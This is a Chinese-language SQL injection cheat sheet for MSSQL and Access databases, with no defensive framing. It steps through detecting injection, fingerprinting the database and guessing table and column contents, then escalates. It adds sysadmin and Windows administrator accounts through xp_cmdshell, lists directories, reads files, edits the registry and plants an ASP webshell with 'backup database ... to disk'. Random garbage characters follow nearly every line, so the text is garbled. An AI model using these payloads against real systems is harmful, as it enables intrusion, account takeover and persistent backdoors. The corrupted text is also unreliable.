1.判断是否有注入;and 1=1 ;and 1=2 <?ID�COt ?
2.初步判断是否是mssql ;and user>0 �Pf4�z�jc�
'"�7b;%EN'
3.注入参数是字符'and [查询条件] and ''=' &D[M<�7T��
3Y��Lfh�`6
4.搜索时没过滤参数的'and [查询条件] and '%25'=' h�Y{4_ie=8
YC 4c��-M
5.判断数据库系统 )!�rD&l$tE
?/MkH0[G�=
;and (select count(*) from sysobjects)>0 mssql d� m"R0>��
�Nv�Ig,@}�
;and (select count(*) from msysobjects)>0 access ,8Q�0Ak�G�
Q�Ch��Wy`x
9�*F��A=�E
�(@*|[w��N
6.猜数据库 ;and (select Count(*) from [数据库名])>0 p<dw ��C"z
S[9�b
I�&C
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 -eK0� +beQ
w{T$3�F`@9
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 "2C}Pr�,p8
��~28{�BY�
9.(1)猜字段的ascii值(access)
�[>G�blL
]�aMDx>O�E
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Jgr;�'U�$�
f�eB ��?�
(2)猜字段的ascii值(mssql) 3C�!|!N1Hn
mIG>`7`�7N
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 um$�U�3'0e
<T�gubv+�J
10.测试权限结构(mssql) �1&e�8vV�N
]!S#[Wt {k
8g{Mv#�b�%
Ygg+=@].@
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ;�8vB7|54.
D�+0il=��5
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �r,IekF�Bs
c%,ky$'18�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- )Rb���t0 �
�J|U~W
k�W
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ��oq|o"n)~
��\2El>>
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- r%=a�:GdAg
�AFsie�J
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 6�@#���=z�
+|S�)�Mm8-
;and 1=(select IS_MEMBER('db_owner'));-- �B�R@gJ(2�
�|wb��_im�
H&*&n}vh5y
I&�15[:b=-
11.添加mssql和系统的帐户 }vB{6E+h/w
W^[�QE�myn
;exec master.dbo.sp_addlogin username;-- !p\�
@�1?�
;exec master.dbo.sp_password null,username,password;-- /J-.K*xKt�
&,p�6�lbP�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �34)l3UI~�
})@xWU6!��
;exec master.dbo.xp_cmdshell 'net user username password C<:wSS�^@1
0# �1�~'�e
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- P;�y!Y/$�C
^=-25%�&^�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- lws.;abm%n
!�}P^O�(oY
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �@/��As|)�
D.7c�WR`Wp
B��(�71I;
|�uFb(kL[U
12.(1)遍历目录 l#ct;K�Z��
J�
Z@�s�k2
;create table dirs(paths varchar(100), id int) Su��,<id�S
|,�n�(9�Ix
;insert dirs exec master.dbo.xp_dirtree 'c:\' ^o�D�s*�F�
4$2HO�`@uN
;and (select top 1 paths from dirs)>0 �T^��d<v�H
� K\� p��Z
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) A9Ea�}v9:�
|iSw�G�=�&
2X��BH�o (
��+ ��rN#�
(2)遍历目录 �\C;Yn6PK0
L*��F�fi�c
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- >��W/m�Rv&
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 j1Sjw6}GCH
w"M�!*�*bP
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 4M>�]0%3.D
'd�QGb-<_<
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 3\ )bg�
R:
I�t�3@
Cd>
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 d\A7}_r*�x
~Od�c�l�rs
&BKnJ�{�,H
U[yA`7�Zs}
13.mssql中的存储过程 ~QE?�GL ��
�c2�GTN��"
xp_regenumvalues 注册表根键, 子键 k�?�3mFW�c
�q�ixnai�Z
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 _� !�"�[Zr
�buKkm�$@w
xp_regread 根键,子键,键值名 A;�/,�</��
H,/�=<Th;i
;exec xp_regread r�WM5&��M
l'!_km0{d�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 F��DG�zh�/
XI >���<;#
xp_regwrite 根键,子键, 值名, 值类型, 值 B�z,�Xg-k+
�Y�>�nQ��<
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 4|j�Pr �J
4rCw#mV�tB
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 |�l|$�Q�;�
ow�,! 7�|m
xp_regdeletevalue 根键,子键,值名 Y?oeP^V'�u
,W�d+&�|Q�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 NS���x�-~)
)�TN�G0��[
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 qMO(j%N�5�
.�UK`~17�!
[e|9%��[.V
��{Aj=Rj@�
14.mssql的backup创建webshell �JGhK8E��
�|9m*��?�7
use model FhEfW�7]0,
[W'2z,S`WD
create table cmd(str image); ��'OhGS�s|
b���9E��b"
insert into cmd(str) values (''); =.`e4}u \X
W��$D:mw7�
backup database model to disk='c:\l.asp'; �ZS&+<k�GD
.q 4FGPWz�
(G�>g0(;D-
��j->5%y��
15.mssql内置函数 2R3)/bz-SV
ncR���]@8
;and (select @@version)>0 获得Windows的版本号 Q`=d�5Uv�w
�?|�h�Y�tV
;and user_name()='dbo' 判断当前系统的连接用户是不是sa []�.euDr�X
Rb�A.&��=3
;and (select user_name())>0 爆当前系统的连接用户 8X\":��l�:
0w�2<2�grQ
;and (select db_name())>0 得到当前连接的数据库 �H7�{k���l
}mk z_�P(Z
(
~>-6Nb 5
/dR:\f�fz2
16.简洁的webshell a��8y*Jz-E
i Hcy,PBD�
use model �ZoqE,ucH�
6099w0�fR`
create table cmd(str image); ;
��j�J%<�
F'@[�b
��
insert into cmd(str) values (''); }f6_�7W�%5
�*�@ S+J�$
backup database model to disk='g:\wwwtest\l.asp';
